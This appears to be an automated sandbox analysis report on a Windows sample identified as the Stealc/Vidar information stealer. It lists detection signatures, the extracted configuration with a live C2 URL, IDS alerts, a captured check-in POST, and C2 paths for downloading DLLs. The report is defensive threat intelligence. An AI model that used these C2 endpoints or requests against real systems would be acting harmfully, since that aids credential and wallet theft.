Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1522463
MD5:	beb729f85b42e8201b31a5b96c898f5f
SHA1:	b29a39f73636dea3780c5167bb87809ef8a82d6c
SHA256:	d71873f393259dc6b0998b4be7be61adbc24e0652716c2aaab2bbcb3d6cafabe
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3852 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BEB729F85B42E8201B31A5B96C898F5F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1669710829.0000000005230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3852	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 3852	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 3852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3852	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.890000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T07:07:59.087038+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T07:07:59.080951+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T07:07:59.306762+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T07:08:00.407860+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T07:07:59.313764+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T07:07:58.855515+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T07:08:00.892889+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-30T07:08:06.664590+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-30T07:08:07.794342+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-30T07:08:08.400190+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-30T07:08:08.987401+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-30T07:08:10.600968+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-30T07:08:11.425128+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 36 36 31 38 30 33 42 32 46 32 34 32 30 33 32 35 35 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="hwid"4D2661803B2F2420325575------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="build"doma------DBAEGCGCGIEGDHIDHJJE--

Source: file.exe, 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllW
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll-
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllE
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllw
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllB
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/a
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php9
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCoinomi
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpEBGDAFHJEBGDGIJDH
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpECBFIDGDAKFHIEHJK
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHDAKECFIDGDGDBKJD
Source: file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpI
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phphN
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpus.wallet
Source: file.exe, 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37m
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1919651984.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1919078277.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: DAKJDAAF.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: DAKJDAAF.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DAKJDAAF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DAKJDAAF.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: DAKJDAAF.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DAKJDAAF.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DAKJDAAF.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GCFHDAKECFIDGDGDBKJD.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://support.mozilla.org
Source: EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1756066006.000000001D88C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1756066006.000000001D88C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: DAKJDAAF.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: DAKJDAAF.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
